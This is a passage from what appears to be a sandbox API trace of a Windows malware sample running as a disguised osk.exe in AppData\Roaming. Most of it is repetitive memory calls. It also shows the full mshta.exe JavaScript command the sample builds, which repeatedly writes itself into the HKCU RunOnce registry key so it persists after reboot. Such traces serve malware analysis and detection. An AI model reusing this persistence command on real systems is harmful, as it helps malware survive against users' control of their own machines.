(hMem=0x45000c) returned 0 [0060.229] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.229] GlobalLock (hMem=0x450004) returned 0x570678 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.229] GlobalUnlock (hMem=0x45000c) returned 0 [0060.229] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.229] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.230] GlobalLock (hMem=0x450004) returned 0x570678 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.230] GlobalUnlock (hMem=0x450004) returned 0 [0060.230] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.230] GlobalUnlock (hMem=0x450004) returned 0 [0060.230] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.230] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) returned 0 [0060.231] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) 
returned 0 [0060.231] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.231] GlobalLock (hMem=0x450004) returned 0x570678 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) returned 0 [0060.231] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.232] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.232] GlobalUnlock (hMem=0x450004) returned 0 [0060.232] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.232] GlobalLock (hMem=0x450004) returned 0x570678 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.232] GlobalUnlock (hMem=0x450004) returned 0 [0060.233] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0060.233] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0060.403] SHGetPathFromIDListW (in: pidl=0x56eb78, pszPath=0x585634 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] IMalloc:Free (This=0x767666bc, pv=0x56eb78) [0060.405] IUnknown:AddRef (This=0x767666bc) 
returned 0x1 [0060.405] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea98b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧侉W\x18") returned 7 [0060.406] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.409] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.413] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.413] GlobalUnlock (hMem=0x450004) returned 0 [0060.413] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.413] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.413] GlobalUnlock (hMem=0x450004) returned 0 [0060.413] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.413] GlobalUnlock (hMem=0x45000c) returned 0 [0060.413] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.413] GlobalUnlock (hMem=0x45000c) returned 0 [0060.413] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.414] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.414] GlobalUnlock (hMem=0x45000c) returned 0 [0060.414] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.414] GlobalUnlock (hMem=0x450004) returned 0 [0060.414] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.414] GlobalUnlock (hMem=0x450004) returned 0 [0060.414] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.414] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.414] GlobalUnlock 
(hMem=0x450004) returned 0 [0060.414] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.414] GlobalUnlock (hMem=0x45000c) returned 0 [0060.414] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0060.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1379, cFileName="osk.exe", cAlternateFileName="")) returned 0x575308 [0060.415] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0060.415] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0060.415] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0060.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1379, cFileName="osk.exe", cAlternateFileName="")) returned 0x575308 [0060.415] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0060.415] 
FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0060.416] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0060.416] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0 [0060.416] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.416] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.416] GlobalUnlock (hMem=0x45000c) returned 0 [0060.416] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.416] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.416] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.416] GlobalUnlock (hMem=0x45000c) returned 0 [0060.417] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.417] GlobalUnlock (hMem=0x450004) returned 0 [0060.417] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="pmleb") returned 0xe4 [0060.417] GetLastError () returned 0x0 [0060.417] SysReAllocStringLen (in: pbstr=0x18fe24*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", len=0x35 | out: pbstr=0x18fe24*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 1 [0060.417] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.417] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.417] GlobalUnlock (hMem=0x450004) returned 0 [0060.417] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.418] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.418] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.418] GlobalUnlock (hMem=0x450004) returned 0 [0060.418] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.418] GlobalUnlock (hMem=0x45000c) returned 0 [0060.418] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e62cf8, cbMultiByte=200, lpWideCharStr=0x18ed68, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:o=new 
ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"\x02") returned 200 [0060.418] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"") returned 1 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=200, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 200 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=157, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 157 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=143, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 143 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=120, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 120 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, 
dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=93, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 93 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=51, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 51 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=").Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=49, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 
out: lpMultiByteStr=").Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 49 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=30, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\\\@!,i);}catch(e){}},10);\";}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 30 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=",i);}catch(e){}},10);\"", cchWideChar=22, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",i);}catch(e){}},10);\"}},10);\";}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 22 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 
[0060.421] SysReAllocStringLen (in: pbstr=0x18fdbc*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fdbc*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.421] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.421] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.421] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.421] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.422] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.422] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.422] GlobalLock (hMem=0x45000c) 
returned 0x56f100 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.422] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e5b808, cbMultiByte=55, lpWideCharStr=0x18ed64, cchWideChar=2047 | out: lpWideCharStr="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb䭈啃屜⅀椬㬩捽瑡档攨笩絽ㄬ⤰∻iveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"\x02") returned 55 [0060.430] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", cchWideChar=200, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 200 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="',i);}catch(e){}},10);\"", cchWideChar=23, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="',i);}catch(e){}},10);\"=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 23 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.431] SysReAllocStringLen (in: pbstr=0x18fdb8*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: pbstr=0x18fdb8*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.431] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: 
pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.432] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.432] WideCharToMultiByte (in: 